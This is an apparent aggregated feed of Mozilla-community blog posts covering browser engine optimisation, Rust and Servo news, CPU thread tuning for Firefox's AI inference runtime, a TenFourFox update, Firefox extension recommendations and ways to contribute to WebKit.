With these changes, Mitchell Baker ends her tenure as Chair and a member of Mozilla Foundation and Mozilla Corporation boards. In co-founding Mozilla, Mitchell built something truly unique and important — a global community and organization that showed how those with vision can shape the world and the future by building technology that puts the needs of humans and humanity first. We are extremely grateful to Mitchell for everything she has done for Mozilla and we are committed to continuing her legacy of fighting for a better future through better technology. I know these feelings are widely shared across Mozilla — we are incredibly appreciative to Mitchell for all that she has done.

As I have said many times over the last few years, Mozilla is entering a new chapter—one where we need to both defend what is good about the web and steer the technology and business models of the AI era in a better direction. I believe that we have the people—indeed, we ARE the people—to do this, and that there are millions around the world ready to help us. I am driven and excited by what lies ahead. 

The post Growing Mozilla — and evolving our leadership appeared first on The Mozilla Blog.

Spidermonkey Development BlogMaking Teleporting Smarter

Recently I got to land a patch which touches a cool optimization that I had to really make sure I understood deeply. As a result, I wrote a huge commit message. I’d like to expand that message a touch here and turn it into a nice blog post.

This post assumes roughly that you understand how Shapes work in the JavaScript object model, and how prototypical property lookup works in JavaScript. If you don’t understand that just yet, this blog post by Matthias Bynens is a good start.

This patch aims to mitigate a performance cliff that occurs when we have applications which shadow properties on the prototype chain or which mutate the prototype chain.

The problem is that these actions currently break a property lookup optimization called “Shape Teleportation”.

What is Shape Teleporting?

Suppose you’re looking up some property y on an object obj, which has a prototype chain with 4 elements. Suppose y isn’t stored on obj, but instead is stored on some prototype object B, in slot 1.

A diagram of shape teleporting

In order to get the value of this property, officially you have to walk from obj up to B to find the value of y. Of course, this would be inefficient, so what we do instead is attach an inline cache to make this lookup more efficient.

Now we have to guard against future mutation when creating an inline cache. A basic version of a cache for this lookup might look like:

  • Check obj still has the same shape.
  • Check obj‘s prototype (D) still has the same shape.
  • Check D‘s prototype (C) still has the same shape
  • Check C’s prototype (B) still has the same shape.
  • Load slot 1 out of B.

This is less efficient than we would like though. Imagine if instead of having 3 intermediate prototypes, there were 13 or 30? You’d have this long chain of prototype shape checking, which takes a long time!

Ideally, what you’d like is to be able to simply say

  • Check obj still has the same shape.
  • Check B still has the same shape.
  • Load slot 1 out of B.

The problem with doing this naively is: “What if someone adds y as a property to C?” With the faster guards, you’d totally miss that value and, as a result, compute the wrong result. We don’t like wrong results.
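To make the hazard concrete, here’s a minimal JavaScript sketch of the setup from the diagram above (the names obj, B, C, D and y are illustrative):

// Prototype chain: obj -> D -> C -> B, with y stored on B.
const B = { y: 1 };
const C = Object.create(B);
const D = Object.create(C);
const obj = Object.create(D);

function getY(o) { return o.y; }  // an inline cache eventually attaches to this access

getY(obj);  // 1, found on B after walking the chain
C.y = 2;    // shadows B.y partway up the chain
getY(obj);  // must now return 2; a cache that only checked obj and B would miss this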

Shape Teleporting is the existing optimization which says that, so long as you actively force a change of shape on objects in the prototype chain when certain modifications occur, you can guard in inline caches only on the shape of the receiver object and the shape of the holder object.

By forcing each shape to be changed, inline caches which have baked in assumptions about these objects will no longer succeed, and we’ll take a slow path, potentially attaching a new IC if possible.

We must reshape in the following situations:

  • Adding a property to a prototype which shadows a property further up the prototype chain. In this circumstance, the object getting the new property will naturally reshape to account for the new property, but the old holder needs to be explicitly reshaped at this point, to avoid an inline cache jumping over the newly defined prototype.

A diagram of shape teleporting

  • Modifying the prototype of an object which exists on the prototype chain. For this case we need to invalidate the shape of the object being mutated (natural reshape due to changed prototype), as well as the shapes of all objects on the mutated object’s prototype chain. This is to invalidate all stubs which have teleported over the mutated object.

A diagram of shape teleporting

Furthermore, we must avoid an “A-B-A” problem, where an object returns to a shape prior to prototype modification: for example, even if we re-shape B, what if code deleted and then re-added y, causing B to take on its old shape? Then the IC would start working again, even though the prototype chain may have been mutated!
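A rough sketch of that A-B-A hazard, continuing the example above (whether a real engine would actually recycle the shape depends on implementation details):

// B currently has some shape S1 (a single data property y).
delete B.y;  // B moves to a different shape
B.y = 1;     // if B could return to a shape indistinguishable from S1,
             // stale inline caches guarding on S1 would start succeeding again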

Prior to this patch, Watchtower watched for prototype mutation and shadowing, and marked the shapes of the prototype objects involved in these operations as InvalidatedTeleporting. This means that property accesses involving those objects can no longer rely on the shape teleporting optimization. This also avoids the A-B-A problem, as new shapes will always carry along the InvalidatedTeleporting flag.

This patch instead chooses to migrate an object shape to dictionary mode, or generate a new dictionary shape if it’s already in dictionary mode. Using dictionary mode shapes works because all dictionary mode shapes are unique and never recycled. This ensures the ICs are no longer valid as expected, as well as handily avoiding the A-B-A problem.

The patch does keep the InvalidatedTeleporting flag to catch potentially ill-behaved sites that do lots of mutation and shadowing, avoiding having to reshape proto objects forever.

The patch also provides a preference to allow cross-comparison between the old and new behaviour; however, it defaults to dictionary-mode teleportation.

Performance testing on micro-benchmarks shows a large impact, since ICs can now attach where they couldn’t before; Speedometer 3, however, shows no real movement.

This Week In RustThis Week in Rust 587

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is httpmock, which is quite unsurprisingly an HTTP mocking library for Rust.

Thanks to Jacob Pratt for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

498 pull requests were merged in the last week

Rust Compiler Performance Triage

This week's results were dominated by the update to LLVM 20 (#135763), which brought a large number of performance improvements, as usual. There were also two other significant improvements, caused by improving the representation of const values (#136593) and doing less work when formatting in rustdoc (#136828).

Triage done by @kobzol.

Revision range: c03c38d5..ce36a966

Summary:

(instructions:u)             mean    range              count
Regressions ❌ (primary)      4.4%   [0.2%, 35.8%]      10
Regressions ❌ (secondary)    1.2%   [0.2%, 5.0%]       13
Improvements ✅ (primary)    -1.6%   [-10.5%, -0.2%]    256
Improvements ✅ (secondary)  -1.0%   [-4.7%, -0.2%]     163
All ❌✅ (primary)            -1.3%   [-10.5%, 35.8%]    266

3 Regressions, 2 Improvements, 4 Mixed; 4 of them in rollups. 50 artifact comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust
Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-19 - 2025-03-19 🦀

Virtual
Asia
Europe
North America
Oceania
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I have found that many automated code review tools, including LLMs, catch 10 out of 3 bugs.

Josh Triplett on r/rust

Despite a lamentable lack of suggestions, llogiq is properly pleased with his choice.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Servo BlogThis month in Servo: new webview API, relative colors, canvas buffs, and more!

Servo now supports several new web API features:

We’ve landed a bunch of HTMLCanvasElement improvements:

[Screenshot: servoshell nightly showing relative oklch() colors, canvas toDataURL() with image/jpeg and image/webp, canvas toBlob(), the WGSLLanguageFeatures API, and the DOM tree of a custom element with a <slot>]

Streams are a lot more useful now, with ReadableStreamBYOBReader now supporting read() (@Taym95, #35040), cancel(), close(), and releaseLock() (@Taym95, #34958).

Servo now passes 40.6% (+7.5pp) of enabled Shadow DOM tests, thanks to our landing support for the :host selector (@simonwuelker, #34870) and the <slot> element (@simonwuelker, #35013, #35177, #35191, #35221, #35137, #35222), plus improvements to event handling (@simonwuelker, #34788, #34884), script (@willypuzzle, #34787), style (@simonwuelker, @jdm, #35198, #35132), and the DOM tree (@simonwuelker, @Taym95, #34803, #34834, #34863, #34909, #35076).

Table layout is significantly better now, particularly in ‘table-layout: fixed’ (@Loirooriol, #35170), table sizing (@Loirooriol, @mrobinson, #34889, #34947, #35167), rowspan sizing (@mrobinson, @Loirooriol, #35095), interaction with floats (@Loirooriol, #35207), and ‘border-collapse’ layout (@Loirooriol, #34932, #34908, #35097, #35122, #35165) and painting (@Loirooriol, #34933, #35003, #35100, #35075, #35129, #35163).

As a result, Servo now passes 90.2% (+11.5pp) of enabled CSS tables tests, and of the tests that are in CSS 2, we now pass more than Blink and WebKit! We literally stood on the shoulders of giants here, because this would not have been possible without Blink’s robust table impl. Despite their age, tables are surprisingly underspecified, so we also needed to report several spec issues along the way (@Loirooriol).

Embedding

Servo aims to be an embeddable web engine, but so far it’s been a lot harder to embed Servo than it should be.

For one, configuring and starting Servo is complicated. We found that getting Servo running at all, even without wiring up input or handling resizes correctly, took over 200 lines of Rust code (@delan, @mrobinson, #35118). Embedders (apps) could only control Servo by sending and receiving a variety of “messages” and “events”, and simple questions like “what’s the current URL?” were impossible to answer without keeping track of extra state in the app.

Contrast this with WebKitGTK, where you can write a minimal kiosk app with a fully-functional webview in under 50 lines of C. To close that gap, we’ve started reworking our embedding API towards something more idiomatic and ergonomic, starting with the concept embedders care about most: the webview.

Our new webview API is controlled by calling methods on a WebView handle (@delan, @mrobinson, #35119, #35183, #35192), including navigation and user input. Handles will eventually represent the lifecycle of the webview itself: if you hold one, the webview is valid, and when you drop it, the webview is destroyed.

Servo needs to call into the embedder too, and here we’ve started replacing the old EmbedderMsg API with a webview delegate (@delan, @mrobinson, #35211), much like the delegates in Apple’s WebKit API. In Rust, a delegate is a trait that the embedder can install its own impl for. Stay tuned for more on this next month!

Embedders can now intercept any request, not just navigation (@zhuhaichao518, #34961), and you can now identify the webview that caused an HTTP credentials prompt (@pewsheen, @mrobinson, #34808).

Other embedding improvements include:

Other changes

We’ve reworked Servo’s preferences system, making all prefs optional with reasonable defaults (@mrobinson, #34966, #34999, #34994). As a result:

  • The names of all preferences have changed; see the Prefs docs for a list
  • Embedders no longer need a prefs.json resource to get Servo running
  • Some debug options were converted to preferences (@mrobinson, #34998)

Devtools now highlights console.log() arguments according to their types (@simonwuelker, #34810).

Servo’s networking is more efficient now, with the ability to cancel fetches for navigation that contain redirects (@mrobinson, #34919) and cancel fetches for <video> and <media> when the document is unloaded (@mrobinson, #34883). Those changes also eliminate per-request IPC channels for navigation and cancellation respectively, and in the same vein, we’ve eliminated them for image loading too (@mrobinson, #35041).

We’ve continued splitting up our massive script crate (@jdm, #34359, #35157, #35169, #35172), which will eventually make Servo much faster to build.

A few crashes have been fixed, including when exiting Servo (@mukilan, #34917), when using the internal memory profiler (@jdm, #35058), and when running ResizeObserver callbacks (@willypuzzle, #35168).

For developers

We now run CI smoketests on OpenHarmony using a real device (@jschwe, @mukilan, #35006), increasing confidence in your changes beyond compile-time errors.

We’ve also tripled our self-hosted CI runner capacity (@delan, #34983, #35002), making concurrent Windows and macOS builds possible without falling back to the much slower GitHub-hosted runners.

Servo can’t yet run WebDriver-based tests on wpt.fyi, wpt.servo.org, or CI, because the servo executor for the Web Platform Tests does not support testdriver.js. servodriver does, though, so we’ve started fixing test regressions with that executor with the goal of eventually switching to it (@jdm, #34957, #34997).

Donations

Thanks again for your generous support! We are now receiving 3835 USD/month (−11.4% over December) in recurring donations. With this money, we’ve been able to expand our self-hosted CI runner capacity for Windows, Linux, and macOS builds, halving mach try build times from over an hour to under 30 minutes!

Servo is also on thanks.dev, and already 21 GitHub users (+5 over December) that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.


As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Conference talks

The Mozilla BlogSpring detox with Firefox for iOS

A hand holding a smartphone with a blooming flower growing from the screen, surrounded by sparkles, against an orange gradient background.

A fresh start isn’t just for your home — your iPhone or iPad deserves a privacy detox too. With Firefox for iOS, you can block hidden trackers, stop fingerprinting, and keep your browsing history more private with Enhanced Tracking Protection.

How Firefox for iOS protects you

Websites and advertisers often track your activity using cookies, fingerprinting and redirect trackers. Firefox’s Enhanced Tracking Protection helps detox your browsing experience by blocking these trackers, keeping your personal data safe from prying eyes.

Learn more about how Enhanced Tracking Protection works in this FAQ.

Privacy features built for iOS

✅ Blocks Social Media Trackers – Prevents social media platforms from monitoring your activity across different sites.
✅ Prevents Cross-Site Tracking – Stops advertisers from following your movements from one site to another.
✅ Blocks Cryptominers and Fingerprinters – Protects your device from unauthorized cryptocurrency mining and digital fingerprinting attempts.
✅ Customizable Protection Levels – Choose between Standard and Strict modes to balance protection and site functionality.
✅ Private Browsing Mode – Browse without saving history, cookies, or site data, ensuring your sessions remain confidential.
✅ Sync Across Devices – Use Firefox on your iPhone, iPad, and desktop while keeping your privacy settings intact.

How to check your privacy settings on Firefox for iOS

Make sure you’re getting the best privacy protection by following these steps on your iPhone or iPad:

  1. Open the Firefox app.
  2. Tap the menu (☰) button at the bottom of the screen.
  3. Select Settings, then tap Tracking Protection.
  4. Choose your desired protection level:
    • Standard: Blocks social media trackers, cross-site trackers, cryptominers, and fingerprinters.
    • Strict: Includes all Standard protections and also stops known tracking content, such as videos, ads, and other elements with tracking code. Pages load faster, but this setting may block some website functionality.

A cleaner, safer way to browse on iOS

Spring cleaning isn’t just about organizing your space—it’s about clearing out digital clutter too. With Firefox for iOS, you can enjoy a faster, safer browsing experience while blocking trackers that slow you down.

🌿 Give your privacy a fresh start — join the Spring Detox with Firefox today.


The post Spring detox with Firefox for iOS appeared first on The Mozilla Blog.

The Mozilla BlogWhat is the best hardware concurrency for running inference on CPU?

In the Firefox AI Runtime, we can use multiple threads in the dedicated inference process to speed up execution times on the CPU. The WASM/JS environment can create a SharedArrayBuffer and run multiple threads against its content, distributing the load across several CPU cores concurrently.

Below is the time taken in seconds on a MacBook M1 Pro, which has 10 physical cores, using our PDF.js image-to-text model to generate an alt text, with different levels of concurrency:

[Graph: inference duration (Y axis) versus number of threads (X axis); 8 threads is fastest, at around 800 ms]

So running several threads is a game-changer! But adding more and more threads eventually starts to slow execution down, to the point where it becomes slower than not using threads at all.

So one question we asked ourselves was: how can we determine the best number of threads?

Physical vs logical cores

According to our most recent public data report, on desktop, 81% of our users are equipped with an Intel CPU, 14% with AMD and the rest are mostly Apple devices.

All modern CPUs provide more logical cores (also called “threads”) than physical cores. This happens thanks to technologies like Intel’s Hyper-Threading or AMD’s Simultaneous Multithreading (SMT).

For example, the Intel Core i9-10900K chip has 10 physical cores and 20 logical cores.

When you spin up threads equal to the number of logical cores, you might see performance gains, especially when tasks are I/O bound or if the CPU can effectively interleave instructions.

However, for compute-bound tasks (like heavy ML inference), having more threads than physical cores can lead to diminishing returns, or even performance drops, due to factors like thread scheduling overhead and cache contention.

Not all cores are created equal

On Apple Silicon, you don’t just have a quantity of cores; you have different kinds of cores. Some are high-performance cores designed for heavy lifting, while others are efficiency cores that are optimized for lower power consumption.

For instance, the Apple M1 Pro chip combines high-performance cores (8) with efficiency cores (2). The physical cores might total 10, but each performance core is designed for heavy-duty tasks, while efficiency cores typically handle background tasks that are less demanding.

When your machine is under load with ML tasks, it’s often better to fully utilize the high-performance cores and leave some breathing room for the efficiency cores to handle background or system processes. 

Similarly, Intel’s processors have different cores, most notably starting with their 12th-generation “Alder Lake” architecture. 

These chips feature Performance-cores (P-cores) designed for demanding, single-threaded tasks, and Efficient-cores (E-cores) aimed at background or less intensive workloads. The P-cores can leverage Intel’s Hyper-Threading technology (meaning each P-core can run two logical threads), while E-cores typically run one thread each. This hybrid approach enables the CPU to optimize power usage and performance by scheduling tasks on the cores best suited for them. As with Apple Silicon, you’d typically want to maximize utilization of the higher-performance P-cores while leaving some headroom on the E-cores for system processes.

Android is close to Apple Silicon’s architecture, as most devices are using ARM’s big.LITTLE (or DynamIQ) architecture – with 2 types of cores: “big” and “LITTLE”.

On mobile Qualcomm CPUs, there can be three types: “Prime”, “Performance” and “Efficiency”. Most recently, some phones like the Samsung Galaxy S24 have gained a fourth kind of core (Exynos 2400), allowing even more combinations.

To summarize, all CPU makers have cores dedicated to performance, and cores for efficiency: 

  • Performance: “P-Core”, “big”, “Prime”, “Performance”
  • Efficiency: “E-Core”, “LITTLE”, “Efficiency”

By combining high-efficiency and high-performance cores, Apple Silicon, Androids, and Intel based devices can strike a better balance between power consumption and raw compute power, depending on the demands of the workload.

But if you try to run all cores (performance + efficiency) at maximum capacity, you may see:

  1. Less optimal thread scheduling, because tasks will bounce between slower efficiency cores and faster performance cores.
  2. Contention for shared resources like the memory bus, cache.
  3. And in extreme cases: thermal throttling if the system overheats, and reaches its Thermal Design Point, in which case the clock speed is throttled to cool down the system. 

This is why simply setting the thread count to “all cores, all the time” can be suboptimal for performance.

AMD, on the other hand, does not have efficiency cores. Some CPUs like the Ryzen 5 8000 series combine two sizes of cores (Zen 4 and Zen 4c), but the latter is not an efficiency core and can also be used to run heavy-duty tasks.

navigator.hardwareConcurrency

In a browser, there is a single and simple API you can call: navigator.hardwareConcurrency

This returns the number of logical cores available. Since it’s the only API available on the web, many libraries (including the one we vendor: onnxruntime) default to using navigator.hardwareConcurrency as a baseline for concurrency.

It’s bad practice to use that value directly, as it might overcommit threads, as explained in the previous sections. It is also unaware of the current system activity.

For that reason, the ONNX formula takes the number of logical cores divided by two and never sets it higher than 4:

Math.min(4, Math.ceil((navigator.hardwareConcurrency || 1) / 2));

That formula works out ok in general, but will not take advantage of all the cores for some devices. For instance, on an Apple M1 Pro, ML tasks could use a concurrency level up to 8 cores instead of 4.

On the other end of the spectrum, consider a chip like Intel’s i3-1220P, which we use in our CI to run tests on Windows 11 and which better reflects what our users have – see the hardware section of our Firefox Public Data Report.

It has 12 logical cores and 10 physical cores, composed of 8 efficiency cores and 2 performance cores. The ONNX formula for that chip means we would run with 4 threads, whereas 2 would be a better value.
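To make this concrete, here is the default formula evaluated for both chips discussed above (core counts as reported by navigator.hardwareConcurrency on those machines):

// Apple M1 Pro: 10 logical cores reported
Math.min(4, Math.ceil(10 / 2));  // 4 threads, even though 8 performance cores are available

// Intel Core i3-1220P: 12 logical cores reported
Math.min(4, Math.ceil(12 / 2));  // 4 threads, even though only 2 performance cores exist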

navigator.hardwareConcurrency is a good starting point, but it’s just a blunt instrument. It won’t always yield the true “best” concurrency for a given device and a given workload.

MLUtils.getOptimalCPUConcurrency

While it’s impossible to get the best value at any given time without considering the system activity as a whole, looking at the number of physical cores, and leaving out “efficiency” cores, can help us get to a better value.

Llama.cpp, for instance, looks at the number of physical cores to decide on concurrency, with a few twists:

  • On any x86_64, it will return the number of performance cores.
  • On Android, and on any aarch64-based devices like Apple Silicon, it will return the number of performance cores for tri-layered chips.

We’ve implemented something very similar in a C++ API that can be used via XPIDL in our inference engine:

NS_IMETHODIMP MLUtils::GetOptimalCPUConcurrency(uint8_t* _retval) {
  ProcessInfo processInfo = {};
  if (!NS_SUCCEEDED(CollectProcessInfo(processInfo))) {
    return NS_ERROR_FAILURE;  
  }
  #if defined(ANDROID)
    // On android, "big" and "medium" cpus can be used.
    uint8_t cpuCount = processInfo.cpuPCount + processInfo.cpuMCount;
  #else
  # ifdef __aarch64__
    // On aarch64 (like macBooks) we want to avoid efficient cores and stick with "big" cpus.
    uint8_t cpuCount = processInfo.cpuPCount;
  # else
    // on x86_64 we're always using the number of physical cores.
    uint8_t cpuCount = processInfo.cpuCores;
  # endif
  #endif
  *_retval = cpuCount;
  return NS_OK;
}

This function is then straightforward to use from JS shipped within Firefox to configure concurrency when we run inference:

let mlUtils = Cc["@mozilla.org/ml-utils;1"].createInstance(Ci.nsIMLUtils);
const numThreads = mlUtils.getOptimalCPUConcurrency();

We’ve moved away from using navigator.hardwareConcurrency, and we’re now using this new API.

Conclusion

In our quest to find the optimal number of threads, we’re closer to reality now, but there are other factors to consider. The system will use the CPU for other applications too, so it’s still possible to overload it.

Using more threads is also going to use more memory in our WASM environment, which can become a real issue. Depending on the workload, each additional thread can add up to 100MiB of physical memory usage in our runtime. We’re working on reducing this overhead but on devices that don’t have a lot of memory, limiting concurrency is still our best option.

For our Firefox ML features, we are using a variety of hardware profiles in our performance CI to make sure that we try them on devices that are close to what our users have. The list of devices we have is going to grow in the next few months to make sure we cover the whole spectrum of CPUs. We’ve started collecting and aggregating metrics on a dashboard that helps us understand what can be expected when our users run our inference engine.

The hardware landscape is also evolving a lot. For example, the most recent Apple devices introduced a new instruction set, called AMX, which used to be proprietary, and gave a significant boost compared to Neon. That has now been replaced by an official API called SME. Similarly, some phones are getting more core types, which could impact how we calculate the number of cores to use. Our current algorithm could be changed the day we leverage these new APIs and hardware in our backend.

Another aspect we have not discussed in this post is using GPU or even more specialized units like NPUs, to offload our ML tasks, which will be a post on its own.

The post What is the best hardware concurrency for running inference on CPU? appeared first on The Mozilla Blog.

Cameron KaiserFebruary patch set for TenFourFox

I was slack on doing the Firefox 128ESR platform rebase for TenFourFox, but I finally got around tuit, mostly because I've been doing a little more work on the Quad G5 and put some additional patches in to scratch my own itches. (See, this is what I mean by "hobby mode.")

The big upgrade is a substantial overhaul of Reader Mode to pick up interval improvements in Readability. I remind folks that I went all-in on Reader Mode for a reason: it's lightweight, it makes little demands of our now antiquated machines (and TenFourFox's antiquated JavaScript runtime), and it renders very, very fast. That's why, for example, you can open a link directly in Reader Mode (right-click, it's there in the menu), the browser defaults to "sticky" Reader Mode where links you click in an article in Reader Mode stay in Reader Mode (like Las Vegas) until you turn it off from the book icon in the address bar, and you can designate certain sites to always open in Reader Mode, either every page or just subpages in case the front page doesn't render well — though that's improved too. (You can configure that from the TenFourFox preference pane. All of these features are unique to TenFourFox.) I also made some subtle changes to the CSS so that it lays out wider, which was really my only personal complaint; otherwise I'm an avid user. The improvements largely relate to better byline and "fluff" text detection as well as improved selection of article inline images. Try it. You'll like it.

I should note that Readability as written no longer works directly on TenFourFox due to syntactic changes and I had to do some backporting. If a page suddenly snaps to the non-Reader view, there was an error. Look in the Browser console for the message and report it; it's possible there is some corner I didn't hit with my own testing.

In addition, there are updates to the ATSUI font blacklist (and a tweak to CFF font table support) and a few low-risk security patches that likely apply to us, as well as refreshed HSTS pins, TLS root certificates, EV roots, timezone data and TLDs. I have also started adding certain AI-related code to the nuisance JavaScript block list as well as some new adbot host aliases I found. Those probably can't run on TenFourFox anyway (properly if at all), but now they won't even be loaded or parsed.

The source code can be downloaded from Github (at the command line you can also just do git clone https://github.com/classilla/tenfourfox.git) and built in the usual way. Remember that these platform updates require a clobber, so you must build from scratch. I was asked about making TenFourFox a bit friendlier with Github; that's a tall order and I'm still thinking about how, but at least the wiki is readable currently even if it isn't very pretty.

Firefox Add-on ReviewsSupercharge your productivity with a Firefox extension

With more work and education happening online (and at home) you may find yourself needing new ways to juice your productivity. From time management to organizational tools and more, the right Firefox extension can give you an edge in the art of efficiency. 

I need help saving and organizing a lot of web content 

Gyazo

Capture, save, and share anything you find on the web. Gyazo is a great tool for personal or collaborative record keeping and research. 

Clip entire pages or just pertinent portions. Save images or take screenshots. Gyazo makes it easy to perform any type of web clipping action by either right-clicking on the page element you want to save or using the extension’s toolbar button. Everything gets saved to your Gyazo account, making it accessible across devices and collaborative teams. 

On your Gyazo homepage you can easily browse and sort everything you’ve clipped; and organize everything into shareable topics or collections.

With its minimalist pop-up interface, Gyazo makes it easy to clip elements, sections, or entire web pages.

Evernote Web Clipper

Similar to Gyazo, Evernote Web Clipper offers a kindred feature set—clip, save, and share web content—albeit with some nice user interface distinctions. 

Evernote places emphasis on making it easy to annotate images and articles for collaborative purposes. It also has a strong internal search feature, allowing you to search for specific words or phrases that might appear across scattered groupings of clipped content. Evernote also automatically strips out ads and social widgets on your saved pages. 

Print Edit WE

If you need to save or print an important web page — but it’s mucked up with a bunch of unnecessary clutter like ads, sidebars, and other peripheral content — Print Edit WE lets you easily remove those unwanted elements.

Along with a host of great features like the option to save web pages as either HTML or PDF files, automatically delete graphics, and the ability to alter text or add notes, Print Edit WE also provides an array of productivity optimizations like keyboard shortcuts and mouse gestures. This is the ideal productivity extension for any type of work steeped in web research and cataloging.

Focus! Focus! Focus!

Anti-distraction and decluttering extensions can be a major boon for online workers and students… 

Block Site 

Do you struggle avoiding certain time-wasting, productivity-sucking websites? With Block Site you can enforce restrictions on sites that tempt you away from good work habits. 

Just list the websites you want to avoid for specified periods of time (certain hours of the day or some days entirely, etc.) and Block Site won’t let you access them until you’re out of the focus zone. There’s also a fun redirection feature where you’re automatically redirected to a more productive website anytime you try to visit a time waster.

Give yourself a custom message of encouragement (or scolding?) whenever you try to visit a restricted site with Block Site.

LeechBlock NG

Very similar in function to Block Site, LeechBlock NG offers a few intriguing twists beyond standard site-blocking features. 

In addition to blocking sites during specified times, LeechBlock NG offers an array of granular, website-specific blocking abilities—from blocking just portions of websites (e.g. you can’t access the YouTube homepage but you can see video pages), to setting restrictions on predetermined days (e.g. no Twitter on weekends), to 60-second delayed access to certain websites to give you time to reconsider that potentially productivity-killing decision.

Tomato Clock

A simple but highly effective time management tool, Tomato Clock (based on the Pomodoro technique) helps you stay on task by tracking short, focused work intervals. 

The premise is simple: it assumes everyone’s productive attention span is limited, so break up your work into manageable “tomato” chunks. Let’s say you work best in 40-minute bursts. Set Tomato Clock and your browser will notify you when it’s break time (the break length is also customizable). It’s a great way to stay focused via short sprints of productivity. The extension also keeps track of your completed tomato intervals so you can track your achieved results over time.

Tabby – Window & Tab Manager

Are you overwhelmed by lots of open tabs and windows? Need an easy way to overcome desktop chaos? Tabby – Window & Tab Manager to the rescue.

Regain control of your ever-sprawling open tabs and windows with an extension that lets you quickly reorganize everything. Tabby makes it easy to find what you need in a chaotic sea of open tabs — you can not only search by word or phrase for the content you’re looking for, but Tabby also has a visual preview feature so you can get a look at each of your open tabs without actually navigating to them. And whenever you need a clean slate but want to save your work, you can save and close all of your open tabs with a single mouse click and return to them later.

Access all of Tabby’s features in one convenient pop-up.

Tranquility Reader

Imagine a world wide web where everything but the words is stripped away—no more distracting images, ads, tempting links to related stories, nothing—just the words you’re there to read. That’s Tranquility Reader.

Simply hit the toolbar button and instantly streamline any web page. Tranquility Reader offers quite a few other nifty features as well, like the ability to save content offline for later reading, customizable font sizes and colors, annotations on saved pages, and more.

We hope some of these great extensions will give your productivity a serious boost! Fact is there are a vast number of extensions out there that could possibly help your productivity—everything from ways to organize tons of open tabs to translation tools to bookmark managers and more. 

Karl DubostSome Ways To Contribute To WebKit and Web Interoperability

Graffiti of a robot on a wall with buildings in the background.

Someone asked me recently how to contribute to the WebKit project and, more specifically, how to find the low-hanging fruit. While some of these tips are specific to WebKit, they can easily be applied to other browsers. Every browser engine project has more bugs than its team can handle.

In no specific order, here are some ideas for contributing.

Curate Old Bugs on the bug tracker

  1. Go through old bugs of bugs.webkit.org.
  2. Try to understand what the bug is about.
  3. Create a simplified test case when there is none and add it as an attachment.
  4. If they show differences between the browsers, take screenshots when the issue is visual in Safari (WebKit), Firefox (Gecko), and Chrome (Blink).
  5. If there is no difference between browsers, CC me on the bug, and we will probably be able to close it.

This might help reveal some old fixable bugs or make them easier to fix for another engineer. Some of them might be easy enough that you can start fixing them yourself.

Find Out About Broken Stuff On WPT.

  1. Dive into all the tests which fail in Safari but pass in Firefox and/or Chrome. (You can do a similar search for things failing in Chrome or failing in Firefox.)
  2. Understand what the test is doing. You can check this with the WPT.live links and/or the associated commit.
  3. Check if the test is not broken and makes sense.
  4. Check if there is an associated bug on bugs.webkit.org. If not, open a new one.

FIXME Hunt Inside WebKit Code

  1. List all the FIXME which are flagged in the WebKit Source code.
  2. Not all of them are easy to fix, but some might be low-hanging fruit. That will require diving into the source code and understanding it.
  3. Open a new bug on bugs.webkit.org if not yet existing.
  4. Eventually propose a patch.

Tests WebKit Quirks

  1. There are a number of Quirks in the WebKit project. These are in place to hotfix websites not doing the right thing.
  2. Sometimes these Quirks are not needed anymore: the site has made a silent fix without telling us about it.
  3. They need to be retested and flagged when they are no longer necessary. This can lead to patches removing the quirk once it is not needed anymore.
  4. Some of these quirks do not have a remove-quirk bug counterpart. It would be good to create the bug for them. Example of a Remove Quirk Bug.

Triage Incoming Bugs On Webcompat.Com For Safari

  1. From time to time, bugs are reported on webcompat.com for Safari.
  2. They need to be analyzed and understood.
  3. Sometimes, a new bug needs to be opened on bugs.webkit.org.

